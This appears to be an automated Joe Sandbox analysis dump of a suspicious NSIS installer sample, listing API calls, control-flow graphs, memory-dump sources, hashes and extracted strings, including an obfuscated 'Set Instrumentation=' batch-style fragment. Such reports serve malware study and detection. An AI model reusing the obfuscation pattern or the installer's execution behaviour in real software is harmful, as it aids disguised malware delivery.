                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                                                                                                                                            • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                                                                                                                            • API String ID: 4283519449-527102705

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 004033F1
                                                                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00403492
                                                                                                                                                                                                                                                                                            • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                                                                                                                                                                                                                                                                            • wsprintfW.USER32 ref: 004034CE
                                                                                                                                                                                                                                                                                            • WriteFile.KERNELBASE(00000000,00000000,0042B018,00403792,00000000), ref: 004034FF
                                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            • Set Instrumentation=oSiSLKennedy-Listings-Plugins-Deployment-mqzBacteria-Simplified-Trades-Luke-Posters-Southwest-Dialogue-Memorial-dqBRFrost-Naturally-sUkPPoultry-Skirts-Picked-NYlBubble-Geological-Descending-Separated-Exhaust-Tax-Eau-Use-rHfnProp, xrefs: 004033FD
                                                                                                                                                                                                                                                                                            • ... %d%%, xrefs: 004034C8
                                                                                                                                                                                                                                                                                            • pAB, xrefs: 004033AB
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CountFileTickWrite$wsprintf
                                                                                                                                                                                                                                                                                            • String ID: ... %d%%$Set Instrumentation=oSiSLKennedy-Listings-Plugins-Deployment-mqzBacteria-Simplified-Trades-Luke-Posters-Southwest-Dialogue-Memorial-dqBRFrost-Naturally-sUkPPoultry-Skirts-Picked-NYlBubble-Geological-Descending-Separated-Exhaust-Tax-Eau-Use-rHfnProp$pAB
                                                                                                                                                                                                                                                                                            • API String ID: 651206458-2973944872

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(00445D80,0042B018,771B23A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(004034E5,00445D80,0042B018,771B23A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042B018,771B23A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042B018,771B23A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2740478559-0

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 729 402713-40273b call 406035 * 2 734 402746-402749 729->734 735 40273d-402743 call 40145c 729->735 737 402755-402758 734->737 738 40274b-402752 call 40145c 734->738 735->734 741 402764-40278c call 40145c call 4062cf WritePrivateProfileStringW 737->741 742 40275a-402761 call 40145c 737->742 738->737 742->741
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                            • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: PrivateProfileStringWritelstrcpyn
                                                                                                                                                                                                                                                                                            • String ID: <RM>$WriteINIStr: wrote [%s] %s=%s in %s$open
                                                                                                                                                                                                                                                                                            • API String ID: 247603264-1827671502
                                                                                                                                                                                                                                                                                            • Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                                                                                                                                                            • Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 750 4021b5-40220b call 40145c * 4 call 404f9e ShellExecuteW 761 402223-4030f2 call 4062cf 750->761 762 40220d-40221b call 4062cf 750->762 762->761
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042B018,771B23A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042B018,771B23A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042B018,771B23A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                            • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                                                                                                                                                                                                                            • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                                            • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                                                                                                                                                                                                                            • API String ID: 3156913733-2180253247
                                                                                                                                                                                                                                                                                            • Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                                                                                                                                                                                                            • Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 770 405eab-405eb7 771 405eb8-405eec GetTickCount GetTempFileNameW 770->771 772 405efb-405efd 771->772 773 405eee-405ef0 771->773 775 405ef5-405ef8 772->775 773->771 774 405ef2 773->774 774->775
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00405EC9
                                                                                                                                                                                                                                                                                            • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CountFileNameTempTick
                                                                                                                                                                                                                                                                                            • String ID: nsa
                                                                                                                                                                                                                                                                                            • API String ID: 1716503409-2209301699

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            control_flow_graph 776 402175-40218b call 401446 * 2 781 402198-40219d 776->781 782 40218d-402197 call 4062cf 776->782 783 4021aa-4021b0 EnableWindow 781->783 784 40219f-4021a5 ShowWindow 781->784 782->781 786 4030e3-4030f2 783->786 784->786
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                            • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                                                                                                                                                                                                                            • String ID: HideWindow
                                                                                                                                                                                                                                                                                            • API String ID: 1249568736-780306582
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: File$AttributesCreate
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 415043291-0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                                                                                                                                                                                                                                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FileRead
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2738559852-0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                                            • CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 4115351271-0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FilePointer
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 973152223-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                                                                                                                                                                            • Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                                                                                                                                                                            • Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CallbackDispatcherUser
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2492992576-0
                                                                                                                                                                                                                                                                                            • Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                                                                                                                                                                            • Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                                                                                                                                                                                                                                                                            • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                                                                                                                                                                                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                                                                                                                                                                                                                                                                            • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 00404AA5
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                                                                                                                                                                                                                                                                            • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(?), ref: 00404DD8
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                                                                                                                                                                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000000), ref: 00404F75
                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003FE), ref: 00404F80
